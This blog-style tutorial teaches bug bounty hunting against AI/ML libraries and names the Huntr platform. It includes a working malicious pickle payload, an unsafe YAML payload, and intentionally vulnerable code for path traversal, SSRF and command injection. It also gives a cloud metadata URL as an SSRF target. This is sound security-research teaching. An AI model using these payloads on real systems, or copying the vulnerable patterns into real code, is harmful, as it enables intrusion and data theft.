Bug bounty hunting has long been an established source of income in the cybersecurity industry. As insecure AI/ML-based applications enter the market in 2024, new bounty programs full of low-hanging fruit are opening up.
In this post, I will outline the best bug bounty platform, the top vulnerabilities to search for, and a simple methodology to find your first bug.
Contents
The Best Bug Bounty Platform
Top Vulnerabilities
1 - Remote Code Execution
2 - File Inclusion
3 - Server-Side Request Forgery
High-Level Testing Methodology
Final Thoughts - The Future
The Best Bug Bounty Platform
While HackerOne and BugCrowd are good generic options, the best AI/ML-specific bug bounty platform is Huntr. This platform offers bounties of up to $3,000 and has 250+ repositories in scope, giving researchers the opportunity to earn substantial income by submitting bugs.
It’s worth noting that Huntr focuses on hacking applications and coding libraries used in AI/ML operations, as opposed to the models themselves. For more information on hacking AI models, check out this blog post.
Top Vulnerabilities
Huntr has identified three top vulnerabilities to search for when conducting penetration tests against AI/ML apps. All three are relatively easy to find and carry high severity scores, giving submissions a good chance of paying out.
1 - Remote Code Execution
Remote Code Execution tends to be an immediate critical severity vulnerability, allowing an attacker to gain full control over a target server.
Many AI/ML libraries began life as programmatic interfaces, with APIs and web UIs developed later on. These later-developed components are often misconfigured, allowing attackers to directly execute commands through the web UI.
Additionally, if the app allows users to upload model files, it may deserialize them insecurely and execute any code embedded inside. This is known as insecure deserialization - you can read my article below to learn more.
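To make the risk concrete, here is a minimal sketch of a malicious pickle-based model file (the filename and command are placeholders); any server that loads it with pickle, or with a wrapper built on pickle such as torch.load or joblib.load, runs the embedded command:

```python
import os
import pickle

# A "model" object that abuses pickle's __reduce__ hook: unpickling it
# runs an arbitrary OS command instead of restoring a normal object.
class MaliciousModel:
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))

# The attacker saves the payload as an innocent-looking model file...
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# ...and any server that loads it with pickle runs the command immediately.
with open("model.pkl", "rb") as f:
    pickle.load(f)  # "id > /tmp/pwned" executes here
```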
2 - File Inclusion
File Inclusion may sound harmless, but it often leads to remote code execution and critical impact. Local File Inclusion enables attackers to read sensitive data from the web server, and Remote File Inclusion may let them execute malicious code embedded in files.
AI/ML applications need to support both data and model files. These often reside in several filesystem locations as users perform operations. Since there is no standard location for the files, AI/ML developers may give users excessive read/write access, paving the way for devastating exploits.
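As a hypothetical example of how this goes wrong, here is a minimal Flask sketch of a model-download endpoint (the route and directory are made up) that is vulnerable to local file inclusion:

```python
import os
from flask import Flask, request, send_file

app = Flask(__name__)
MODEL_DIR = "/srv/models"  # hypothetical storage location

# Vulnerable: the user-supplied name is joined to MODEL_DIR with no
# sanitization, so "?name=../../etc/passwd" escapes the model directory
# and serves arbitrary files (LFI). A safer version would use
# flask.send_from_directory, which rejects paths outside MODEL_DIR.
@app.route("/models/download")
def download_model():
    name = request.args.get("name", "")
    return send_file(os.path.join(MODEL_DIR, name))
```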
3 - Server-Side Request Forgery
SSRF is usually less severe than the top two vulnerabilities, yet it is so common in AI/ML apps that it is a prime candidate to test for. SSRF can be used to exfiltrate sensitive data, crash the target website, or, in specific cases, remotely execute code.
Many AI platforms allow users to upload data in several ways - Amazon S3, HTTP, FTP, and more. Attackers may be able to control where these requests are sent. A common impact is inducing the server to query sensitive internal locations, such as router configuration pages.
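A minimal sketch of the vulnerable pattern, assuming a hypothetical "import dataset from URL" endpoint, looks like this:

```python
import requests
from flask import Flask, jsonify, request

app = Flask(__name__)

# Vulnerable: the server fetches whatever URL the user supplies, with no
# allow-list or scheme check, so an attacker can point it at internal
# targets, e.g. ?url=http://169.254.169.254/latest/meta-data/ (cloud
# metadata) or ?url=http://192.168.1.1/ (router admin page).
@app.route("/datasets/import")
def import_dataset():
    url = request.args.get("url", "")
    resp = requests.get(url, timeout=10)
    return jsonify({"bytes_fetched": len(resp.content)})
```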
High-Level Testing Methodology
You can get started testing AI/ML applications for vulnerabilities right away. The following high-level methodology was summarized from Huntr’s Tutorial page, which provides more detail for each step.
1. Static Code Analysis
Download an AI/ML library from GitHub.
Run a Snyk vulnerability scan on the library (free VSCode plugin).
Review the Snyk scan report.
Filter out non-relevant issues, such as XSS where JSON is returned or path traversals that affect non-user-facing utility scripts.
Identify the five files with the highest number of findings.
Perform a targeted search for dangerous functions and patterns (see the sketch after this list):
eval(
exec(
subprocess.
os.system
pickle.dumps
pickle.loads
shell=True
yaml.load
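As an illustration of why these patterns matter, here is a small sketch of the classic yaml.load issue; the payload and command are purely illustrative:

```python
import yaml

# Hypothetical attacker-supplied YAML: with an unsafe loader, parsing it
# instantiates arbitrary Python objects and runs os.system immediately.
payload = '!!python/object/apply:os.system ["id > /tmp/pwned"]'

# Dangerous pattern flagged by the search above - the command executes
# during parsing, before the application ever inspects the result.
yaml.load(payload, Loader=yaml.UnsafeLoader)

# Safe alternative: safe_load only builds plain scalars, lists, and dicts.
try:
    yaml.safe_load(payload)
except yaml.YAMLError:
    print("safe_load rejected the python/object tag")
```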
2. Map Out The Application
Check the /docs directory for an OpenAPI specification. If unavailable, use a tool like ChatGPT to generate an API spec based on the documentation.
Failing that, populate the application with test data and proxy traffic using a Web App Proxy tool.
Save and name each unique API request captured in the proxy.
Search for URL patterns such as ftp://, s3://, and http:// in API requests, indicating potential SSRF vulnerabilities.
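If you export the captured requests to disk, a quick script along these lines (the directory layout is an assumption) can flag the ones worth testing for SSRF:

```python
import re
from pathlib import Path

# Assumes each captured API request was exported from the proxy as a text
# file under ./captured_requests/ - adjust the path to your own setup.
URL_SCHEMES = re.compile(r"(ftp://|s3://|https?://)", re.IGNORECASE)

for request_file in Path("captured_requests").glob("*.txt"):
    text = request_file.read_text(errors="ignore")
    for line_no, line in enumerate(text.splitlines(), start=1):
        if URL_SCHEMES.search(line):
            # Candidate SSRF insertion point: a URL the server may fetch.
            print(f"{request_file.name}:{line_no}: {line.strip()}")
```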
3. Automatic Testing
Perform an active scan on each API request.
Monitor each request in a logging tool and document any anomalies, such as unexpected status codes, unusually long responses, or truncated outputs.
4. Manual Testing
Inject payloads into each API request using the Big List of Naughty Strings.
Use Sniper mode in Burp Intruder to create multiple insertion points for comprehensive coverage.
Analyze all responses, looking for unusual status codes or variations in response length.
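If you prefer scripting this step, a rough equivalent of the Intruder setup might look like the sketch below; the endpoint, parameter name, and anomaly thresholds are all placeholders to adapt to your target:

```python
import requests

# Hypothetical endpoint and parameter - substitute one of the API requests
# you mapped out earlier. blns.txt is the Big List of Naughty Strings.
TARGET = "http://localhost:8000/api/models"
PARAM = "name"
baseline = requests.get(TARGET, params={PARAM: "test"}, timeout=10)

with open("blns.txt", encoding="utf-8") as f:
    payloads = [line.rstrip("\n") for line in f if line.strip()]

for payload in payloads:
    resp = requests.get(TARGET, params={PARAM: payload}, timeout=10)
    # Flag anomalies: server errors or large deviations in response length.
    if resp.status_code >= 500 or abs(len(resp.text) - len(baseline.text)) > 500:
        print(f"{resp.status_code} len={len(resp.text)} payload={payload!r}")
```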
5. Authentication Testing
Install the Autorize extension in Burp Suite.
Set up Autorize with a low-privilege user’s authentication token.
Navigate the application as a high-privilege user and ensure that access controls are properly enforced.
Verify that all privileged requests are restricted and logged correctly in the Autorize interface.
What to Look For:
Remote Code Execution
Often results from arbitrary file overwrites but can also occur in cases where user input is improperly executed within a command.
Review all instances of user input being placed directly into executable operations for vulnerabilities.
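As a hypothetical example of the pattern described above - user input flowing into a shell command - consider:

```python
import subprocess

# Hypothetical helper in an AI/ML app: the dataset name arrives straight
# from an API request and is interpolated into a shell command.
def export_dataset(name: str) -> int:
    # Vulnerable: "demo; cat /etc/passwd" injects a second command (RCE).
    return subprocess.run(f"tar czf /tmp/{name}.tar.gz data/{name}",
                          shell=True).returncode

# Safer: pass an argument list and drop shell=True, so the name is never
# parsed by a shell.
def export_dataset_safe(name: str) -> int:
    return subprocess.run(
        ["tar", "czf", f"/tmp/{name}.tar.gz", f"data/{name}"]
    ).returncode
```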
File Inclusion
Check API calls used for exporting models or datasets from the AI/ML system.
Overwriting critical files, such as .bashrc or SSH credentials, can often result in remote code execution.
Also check API calls that import or read models and data files, as they are susceptible to local file inclusion.
Look for endpoints that use naming conventions like GetArtifact or get-artifact for opportunities to access sensitive files, such as SSH or cloud keys.
Server-Side Request Forgery (SSRF)
Target API calls that handle data from S3 buckets or accept URLs as input.
Exploit these to initiate internal network requests, potentially exposing services or internal metadata at addresses like http://169.254.169.254/latest/meta-data/.
Final Thoughts - The Future
Data scientists are not developers - they often lack the secure coding experience of professional software engineers. Unfortunately, the apps they develop are often full of high-severity bugs reminiscent of web applications 10+ years ago. There is a fantastic opportunity to make money via AI bug bounty programs right now!
As AI/ML apps and their associated bounties become more mainstream, vulnerabilities will be patched, and the risk of these applications being hacked will reduce. However, the impact of exploitation will increase as more organizations integrate such apps into their infrastructure. Learning about AI Security now will position security professionals to handle challenges like these in the future.